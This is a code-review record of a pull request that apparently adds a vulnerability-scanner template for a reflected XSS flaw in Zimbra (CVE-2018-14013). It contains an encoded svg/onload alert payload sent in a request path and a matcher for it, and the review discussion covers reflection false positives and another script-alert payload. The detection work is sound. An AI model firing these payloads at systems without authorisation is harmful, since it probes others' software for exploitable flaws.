### PR TITLE
Add Zimbra XSS

### PR DESCRIPTION
**Pull request by pikpikcu**

### CODE REVIEW

File: cves/2018/CVE-2018-14013.yaml [hunk 1]
```diff
@@ -0,0 +1,29 @@
...
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<svg onload=alert(document.domain)>'
```
Comment (toufik-airane) [inline cves/2018/CVE-2018-14013.yaml:19]: Avoid reflecting the matched words with the requested path.

**Review by toufik-airane — CHANGES_REQUESTED** [review]
Dear @pikpikcu,

the template seems good but can we think about another matcher to avoid reflecting the matched words with the requested path?

Indeed, the word `'<svg onload=alert(document.domain)>'` can be reflected with the path `%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E`.

Thank you.

File: cves/2018/CVE-2018-14013.yaml (hunk 1 above)
Comment (princechaddha) [reply cves/2018/CVE-2018-14013.yaml]: hello @pikpikcu @toufik-airane, I have updated the template.

Comment (toufik-airane) [reply cves/2018/CVE-2018-14013.yaml]: Thank you. @princechaddha
So could I conclude that `<script>alert()</script>` is a payload to reflect and match?

**Pull request merged**